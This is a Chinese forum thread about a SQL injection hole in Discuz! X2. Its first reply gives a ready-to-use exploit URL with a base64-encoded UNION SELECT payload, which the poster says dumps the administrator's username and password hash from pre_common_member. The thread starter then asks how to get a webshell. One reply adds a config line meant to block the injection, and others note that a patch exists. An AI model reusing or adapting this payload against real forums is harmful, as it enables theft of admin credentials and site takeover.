设为首页收藏本站

简体中文 繁體中文 English 日本語 Deutsch 한국 사람 بالعربية TÜRKÇE português คนไทย Français

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
楼主: adnim

Discuz! X2 SQL注射漏洞

[复制链接]

29

主题

440

回帖

1077

积分

金牌会员

积分
1077
发表于 2011-6-29 14:17:37 | 显示全部楼层
http://XXXXXXXX/forum.php?mod=attachment&findpost=ss&aid=MScgYW5kIDE9MiB1bmlvbiBhbGwgc2VsZWN0IDEsZ3JvdXBfY29uY2F0KHVzZXJuYW1lLDB4N0MzMjc0NzQ3QyxwYXNzd29yZCkgZnJvbSBwcmVfY29tbW9uX21lbWJlciB3aGVyZSAgdXNlcm5hbWUgbGlrZSAnYWRtaW58eHx5%3D

默認前墜之下爆出管理員帳號密碼。
回复

使用道具 举报

24

主题

111

回帖

316

积分

中级会员

积分
316
 楼主| 发表于 2011-6-29 14:23:04 | 显示全部楼层
求getwebshell
回复

使用道具 举报

152

主题

4514

回帖

9600

积分

论坛元老

积分
9600
发表于 2011-6-29 14:23:29 | 显示全部楼层
新版本我向来不用,不稳定,没经历风雨。我用7.2
回复

使用道具 举报

241

主题

1308

回帖

3495

积分

论坛元老

积分
3495
发表于 2011-6-29 14:27:44 | 显示全部楼层
原帖由 vvx.cc 於 2011-6-29 14:55 發表


新版本我向來不用,不穩定,沒經歷風雨。我用7.2
7.2有xxs漏洞額..
回复

使用道具 举报

29

主题

440

回帖

1077

积分

金牌会员

积分
1077
发表于 2011-6-29 14:53:48 | 显示全部楼层
config/config_global.php 文件中查找代码
$_config['security']['querysafe']['daction']['3'] = '(select';
在下面新增一行代码
$_config['security']['querysafe']['daction'][] = 'unionall';
回复

使用道具 举报

103

主题

1716

回帖

3905

积分

论坛元老

积分
3905
发表于 2011-6-29 14:55:13 | 显示全部楼层
回复

使用道具 举报

56

主题

928

回帖

2228

积分

金牌会员

积分
2228
发表于 2011-6-29 14:57:14 | 显示全部楼层
真伤不起啊,又爆洞洞给解释下是啥子意思?
回复

使用道具 举报

0

主题

2

回帖

6

积分

新手上路

积分
6
发表于 2011-6-29 16:06:04 | 显示全部楼层
补丁出来了...
回复

使用道具 举报

224

主题

3058

回帖

6910

积分

论坛元老

积分
6910
发表于 2011-6-29 16:13:51 | 显示全部楼层
官方升级了?
回复

使用道具 举报

114

主题

1万

回帖

2万

积分

论坛元老

积分
22464
发表于 2011-6-29 16:22:51 | 显示全部楼层
都是些临时工写的代码。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver|手机版|小黑屋|Discuz! X

GMT+8, 2026-6-27 10:35 , Processed in 0.016645 second(s), 3 queries , Gzip On, Redis On.

Powered by Discuz! X5.0

© 2001-2026 Discuz! Team.

快速回复 返回顶部 返回列表